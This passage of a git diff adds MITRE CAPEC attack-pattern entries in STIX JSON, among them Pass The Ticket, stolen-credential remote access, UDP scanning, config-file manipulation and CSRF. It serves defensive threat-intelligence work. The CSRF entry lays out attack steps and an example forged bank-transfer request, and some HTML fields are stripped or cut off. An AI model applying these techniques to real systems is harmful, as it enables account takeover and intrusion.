"attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Use of Captured Tickets (Pass The Ticket)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c" + ], + "x_capec_consequences": { + "Integrity": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Bronze Butler (also known as Tick), has been shown to leverage forged Kerberos Ticket Granting Tickets (TGTs) and Ticket Granting Service (TGS) tickets to maintain administrative access on a number of systems. [REF-584]" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary needs physical access to the victim system.", + "The use of a third-party credential harvesting tool." + ], + "x_capec_skills_required": { + "High": "The adversary uses a third-party tool to obtain the necessary tickets to execute the attack.", + "Low": "Determine if Kerberos authentication is used on the server." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0618a68a-c6e1-4370-82d3-c76fa2745905.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0618a68a-c6e1-4370-82d3-c76fa2745905.json new file mode 100644 index 0000000000000000000000000000000000000000..aa0dcba56444a84135b2fd8d63c4e58dc1d6cdc0 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0618a68a-c6e1-4370-82d3-c76fa2745905.json @@ -0,0 +1,42 @@ +{ + "id": "bundle--da039cb2-0553-4b45-b243-bbbcef385587", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "", + "external_references": [ + { + "external_id": "CAPEC-435", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/435.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--0618a68a-c6e1-4370-82d3-c76fa2745905", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Target Influence via Instant Rapport", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be.json new file mode 100644 index 0000000000000000000000000000000000000000..31c9bb68cf9c446f4cf07b6ec673aa5519c5a441 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be.json @@ -0,0 +1,96 @@ +{ + "id": "bundle--166a8c6c-2412-4410-bede-9eea8069da67", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This pattern of attack involves an adversary that uses stolen credentials to leverage remote services such as RDP, telnet, SSH, and VNC to log into a system. Once access is gained, any number of malicious activities could be performed.", + "external_references": [ + { + "external_id": "CAPEC-555", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/555.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "description": "Remote Services", + "external_id": "T1021", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1021" + }, + { + "description": "Email Collection:Remote Email Collection", + "external_id": "T1114.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1114/002" + }, + { + "description": "External Remote Services", + "external_id": "T1133", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1133" + } + ], + "id": "attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Remote Services with Stolen Credentials", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). There are other implementations and third-party tools that provide graphical access Remote Services similar to RDS. Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.", + "Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). It may be called with the winrm command or by any number of programs such as PowerShell." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--071baf4e-1d72-497e-8ac4-edb513262aca.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--071baf4e-1d72-497e-8ac4-edb513262aca.json new file mode 100644 index 0000000000000000000000000000000000000000..fb411a5f87f7bbfe39d69d5c534d52117248ff79 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--071baf4e-1d72-497e-8ac4-edb513262aca.json @@ -0,0 +1,29 @@ +{ + "id": "bundle--d09b00cd-66be-4092-a8bf-3dd885546af6", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-13 : Subverting Environment Variable Values\". Please refer to this other CAPEC going forward.", + "external_references": [ + { + "external_id": "CAPEC-264", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/264.html" + } + ], + "id": "attack-pattern--071baf4e-1d72-497e-8ac4-edb513262aca", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Environment Variable Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--074a7522-162a-4656-8c50-36ce5ee5adc6.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--074a7522-162a-4656-8c50-36ce5ee5adc6.json new file mode 100644 index 0000000000000000000000000000000000000000..7465874a6f8f6ca67a26db19bd4e437a20db55fb --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--074a7522-162a-4656-8c50-36ce5ee5adc6.json @@ -0,0 +1,87 @@ +{ + "id": "bundle--adb95240-6b88-4395-8777-7e2a6197220d", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in UDP scanning to gather information about UDP port status on the target system. UDP scanning methods involve sending a UDP datagram to the target port and looking for evidence that the port is closed. Open UDP ports usually do not respond to UDP datagrams as there is no stateful mechanism within the protocol that requires building or establishing a session. Responses to UDP datagrams are therefore application specific and cannot be relied upon as a method of detecting an open port. UDP scanning relies heavily upon ICMP diagnostic messages in order to determine the status of a remote port.", + "external_references": [ + { + "external_id": "CAPEC-308", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "J. Postel, RFC768 - User Datagram Protocol, 1980--08---28", + "external_id": "REF-158", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc768.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC, ISBN: 978-0-9799587-1-7", + "external_id": "REF-34", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 51), Phrack Magazine, 1997", + "external_id": "REF-130", + "source_name": "reference_from_CAPEC", + "url": "http://phrack.org/issues/51/11.html" + } + ], + "id": "attack-pattern--074a7522-162a-4656-8c50-36ce5ee5adc6", + "modified": "2022-02-22T00:00:00.000Z", + "name": "UDP Scan", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9ca34308-a8e4-40b6-becd-3ff95bac628a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Experiment

  1. An adversary sends UDP packets to target ports.

  2. An adversary uses the response from the target to determine the port's state. Whether a port responds to a UDP packet is dependant on what application is listening on that port. No response does not indicate the port is not open.

", + "x_capec_extended_description": "\n During a UDP scan, a datagram is sent to a target port. If an 'ICMP Type 3 Port unreachable' error message is returned then the port is considered closed. Different types of ICMP messages can indicate a filtered port. UDP scanning is slower than TCP scanning. The protocol characteristics of UDP make port scanning inherently more difficult than with TCP, as well as dependent upon ICMP for accurate scanning. Due to ambiguities that can arise between open ports and filtered ports, UDP scanning results often require a high degree of interpretation and further testing to refine. In general, UDP scanning results are less reliable or accurate than TCP-based scanning.\n ", + "x_capec_prerequisites": [ + "The ability to send UDP datagrams to a host and receive ICMP error messages from that host. In cases where particular types of ICMP messaging is disallowed, the reliability of UDP scanning drops off sharply." + ], + "x_capec_resources_required": [ + "The ability to craft custom UDP Packets for use during network reconnaissance. This can be accomplished via the use of a port scanner, or via socket manipulation in a programming or scripting language. Packet injection tools are also useful. It is also necessary to trap ICMP diagnostic messages during this process. Depending upon the method used it may be necessary to sniff the network in order to see the response." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb.json new file mode 100644 index 0000000000000000000000000000000000000000..88bb989f727281a0460531f3e9eb72fa9106c2d5 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb.json @@ -0,0 +1,92 @@ +{ + "id": "bundle--2ea1bdda-a06e-4a67-9a5f-a12e922a0e90", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Generally these are manually edited files that are not in the preview of the system administrators, any ability on the attackers' behalf to modify these files, for example in a CVS repository, gives unauthorized access directly to the application, the same as authorized users.", + "external_references": [ + { + "external_id": "CAPEC-75", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/75.html" + }, + { + "external_id": "CWE-349", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/349.html" + }, + { + "external_id": "CWE-99", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/99.html" + }, + { + "external_id": "CWE-77", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/77.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-353", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html" + }, + { + "external_id": "CWE-354", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/354.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Manipulating Writeable Configuration Files", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f9f65fdd-5857-4a57-a725-066465397601" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The BEA Weblogic server uses a config.xml file to store configuration data. If this file is not properly protected by the system access control, an attacker can write configuration information to redirect server output through system logs, database connections, malicious URLs and so on. Access to the Weblogic server may be from a so-called Custom realm which manages authentication and authorization privileges on behalf of user principals. Given write access, the attacker can insert a pointer to a custom realm jar file in the config.xml\n < CustomRealmConfigurationData=\"java.util.Properties\"Name=\"CustomRealm\"RealmClassName=\"Maliciousrealm.jar\"/>\n \n The main issue with configuration files is that the attacker can leverage all the same functionality the server has, but for malicious means. Given the complexity of server configuration, these changes may be very hard for administrators to detect.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Configuration files must be modifiable by the attacker" + ], + "x_capec_skills_required": { + "Medium": "To identify vulnerable configuration files, and understand how to manipulate servers and erase forensic evidence" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d.json new file mode 100644 index 0000000000000000000000000000000000000000..2e6e244e08132af17b99457c825c993e18b80a95 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d.json @@ -0,0 +1,116 @@ +{ + "id": "bundle--de716e2a-a3d4-40b8-a3da-527be75f6a35", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker crafts malicious web links and distributes them (via web pages, email, etc.), typically in a targeted manner, hoping to induce users to click on the link and execute the malicious action against some third-party application. If successful, the action embedded in the malicious link will be processed and accepted by the targeted application with the users' privilege level. This type of attack leverages the persistence and implicit trust placed in user session cookies by many web applications today. In such an architecture, once the user authenticates to an application and a session cookie is created on the user's system, all following transactions for that session are authenticated using that cookie including potential actions initiated by an attacker and simply \"riding\" the existing session cookie.", + "external_references": [ + { + "external_id": "CAPEC-62", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/62.html" + }, + { + "external_id": "CWE-352", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/352.html" + }, + { + "external_id": "CWE-306", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/306.html" + }, + { + "external_id": "CWE-664", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/664.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "external_id": "CWE-1275", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1275.html" + }, + { + "description": "Cross-Site Request Forgery", + "external_id": "09", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Cross-Site-Request-Forgery" + }, + { + "description": "Cross Site Request Forgery (CSRF)", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/csrf" + }, + { + "description": "Thomas Schreiber, Session Riding: A Widespread Vulnerability in Today's Web Applications, SecureNet GmbH", + "external_id": "REF-62", + "source_name": "reference_from_CAPEC", + "url": "https://crypto.stanford.edu/cs155old/cs155-spring08/papers/Session_Riding.pdf" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-602", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/05-Testing_for_Cross_Site_Request_Forgery.html" + } + ], + "id": "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Cross Site Request Forgery", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "Session Riding" + ], + "x_capec_child_of_refs": [ + "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n While a user is logged into their bank account, an attacker can send an email with some potentially interesting content and require the user to click on a link in the email.\n The link points to or contains an attacker setup script, probably even within an iFrame, that mimics an actual user form submission to perform a malicious activity, such as transferring funds from the victim's account.\n The attacker can have the script embedded in, or targeted by, the link perform any arbitrary action as the authenticated user. When this script is executed, the targeted application authenticates and accepts the actions based on the victims existing session cookie.See also: Cross-site request forgery (CSRF) vulnerability in util.pl in @Mail WebMail 4.51 allows remote attackers to modify arbitrary settings and perform unauthorized actions as an arbitrary user, as demonstrated using a settings action in the SRC attribute of an IMG element in an HTML e-mail." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Explore target website: The attacker first explores the target website to determine pieces of functionality that are of interest to them (e.g. money transfers). The attacker will need a legitimate user account on the target website. It would help to have two accounts.

    2. Techniques
    Use web application debugging tool such as WebScarab, Tamper Data or TamperIE to analyze the information exchanged between the client and the server
    Use network sniffing tool such as Wireshark to analyze the information exchanged between the client and the server
    View HTML source of web pages that contain links or buttons that perform actions of interest.

Experiment

  1. Create a link that when clicked on, will execute the interesting functionality.: The attacker needs to create a link that will execute some interesting functionality such as transfer money, change a password, etc.

    2. Techniques
    Create a GET request containing all required parameters (e.g. https://www.somebank.com/members/transfer.asp?to=012345678901&amt=10000)
    Create a form that will submit a POST request (e.g.

Exploit

  1. Convince user to click on link: Finally, the attacker needs to convince a user that is logged into the target website to click on a link to execute the CSRF attack.

    2. Techniques
    Execute a phishing attack and send the user an e-mail convincing them to click on a link.
    Execute a stored XSS attack on a website to permanently embed the malicious link into the website.
    Execute a stored XSS attack on a website where an XMLHTTPRequest object will automatically execute the attack as soon as a user visits the page. This removes the step of convincing a user to click on a link.
    Include the malicious link on the attackers' own website where the user may have to click on the link, or where an XMLHTTPRequest object may automatically execute the attack when a user visits the site.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--c50d5a35-0010-422d-b6f7-d4b963c9bad4" + ], + "x_capec_resources_required": [ + "All the attacker needs is the exact representation of requests to be made to the application and to be able to get the malicious link across to a victim." + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to figure out the exact invocation of the targeted malicious action and then craft a link that performs the said action. Having the user click on such a link is often accomplished by sending an email or posting such a link to a bulletin board or the likes." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0a765348-6b5a-4797-9724-44b4fc4f9c55.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0a765348-6b5a-4797-9724-44b4fc4f9c55.json new file mode 100644 index 0000000000000000000000000000000000000000..c8378c7225f9f65051e5c1cb02c8f6b14f23c88a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0a765348-6b5a-4797-9724-44b4fc4f9c55.json @@ -0,0 +1,49 @@ +{ + "id": "bundle--846f1965-3494-4a8f-af2b-e10356d8a807", + "objects": [ + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack pattern, an adversary physically disables networking hardware by powering it down or disconnecting critical equipment. Disabling or shutting off critical system resources prevents them from performing their service as intended, which can have direct and indirect consequences on other systems. This attack pattern is considerably less technical than the selective blocking used in most obstruction attacks.", + "external_references": [ + { + "external_id": "CAPEC-583", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/583.html" + }, + { + "description": "Analysis of Country-wide Internet Outages Caused by Censorship, 2011, Center for Applied Internet Data Analysis", + "external_id": "REF-464", + "source_name": "reference_from_CAPEC", + "url": "http://www.caida.org/publications/papers/2011/outages_censorship/outages_censorship.pdf" + } + ], + "id": "attack-pattern--0a765348-6b5a-4797-9724-44b4fc4f9c55", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Disabling Network Hardware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--795c323b-cae6-4846-99f1-dad3fe0ab8e8" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Denial of Service)" + ] + }, + "x_capec_domains": [ + "Hardware" + ], + "x_capec_prerequisites": [ + "The adversary requires physical access to the targeted communications equipment (networking devices, cables, etc.), which may be spread over a wide area." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0a899aed-6271-4cc9-8ffc-5c9575776731.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0a899aed-6271-4cc9-8ffc-5c9575776731.json new file mode 100644 index 0000000000000000000000000000000000000000..0c2c4d0966a9cee6b51d2de92be3d384c5600875 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0a899aed-6271-4cc9-8ffc-5c9575776731.json @@ -0,0 +1,73 @@ +{ + "id": "bundle--acca830b-0515-460e-80ab-4681e294b274", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker hosts or joins an event or transaction within an application framework in order to change the content of messages or items that are being exchanged. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, substitute one item or another, spoof an existing item and conduct a false exchange, or otherwise change the amounts or identity of what is being exchanged. The techniques require use of specialized software that allow the attacker to man-in-the-middle communications between the web browser and the remote system in order to change the content of various application elements. Often, items exchanged in game can be monetized via sales for coin, virtual dollars, etc. The purpose of the attack is for the attack to scam the victim by trapping the data packets involved the exchange and altering the integrity of the transfer process.", + "external_references": [ + { + "external_id": "CAPEC-385", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/385.html" + }, + { + "external_id": "CWE-471", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/471.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--0a899aed-6271-4cc9-8ffc-5c9575776731", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Transaction or Event Tampering via Application API Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ea07b1ea-c1b0-4923-8d25-a8fc39da040a" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "Targeted software is utilizing application framework APIs" + ], + "x_capec_resources_required": [ + "A software program that allows the use of adversary-in-the-middle communications (CAPEC-94) between the client and server, such as a man-in-the-middle proxy." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0a8ef002-1cb8-46e1-bc44-efd0a39b2a67.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0a8ef002-1cb8-46e1-bc44-efd0a39b2a67.json new file mode 100644 index 0000000000000000000000000000000000000000..32b099c271049f749a209d43885284b47ab037b4 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0a8ef002-1cb8-46e1-bc44-efd0a39b2a67.json @@ -0,0 +1,70 @@ +{ + "id": "bundle--8340da62-8f2a-4c99-a71c-1d8f3bc6323f", + "objects": [ + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An Adversary can eavesdrop on the content of an external monitor through the air without modifying any cable or installing software, just capturing this signal emitted by the cable or video port, with this the attacker will be able to impact the confidentiality of the data without being detected by traditional security tools", + "external_references": [ + { + "external_id": "CAPEC-699", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/699.html" + }, + { + "external_id": "CWE-1300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1300.html" + }, + { + "description": "TempestSDR: An SDR Tool For Eavesdropping on Computer Screens Via Unintentionally Radiated RF", + "external_id": "REF-744", + "source_name": "reference_from_CAPEC", + "url": "https://www.rtl-sdr.com/tempestsdr-a-sdr-tool-for-eavesdropping-on-computer-screens-via-unintentionally-radiated-rf/" + }, + { + "description": "Dan Maloney, Exposing Computer Monitor Side-Channel Vulnerabilities with TempestSDR", + "external_id": "REF-745", + "source_name": "reference_from_CAPEC", + "url": "https://hackaday.com/2020/07/15/exposing-computer-monitor-side-channel-vulnerabilities-with-tempestsdr/" + } + ], + "id": "attack-pattern--0a8ef002-1cb8-46e1-bc44-efd0a39b2a67", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Eavesdropping on a Monitor", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_child_of_refs": [ + "attack-pattern--94e596d2-6844-4031-80c3-8522642aaff8" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_execution_flow": "

Execution Flow

Explore

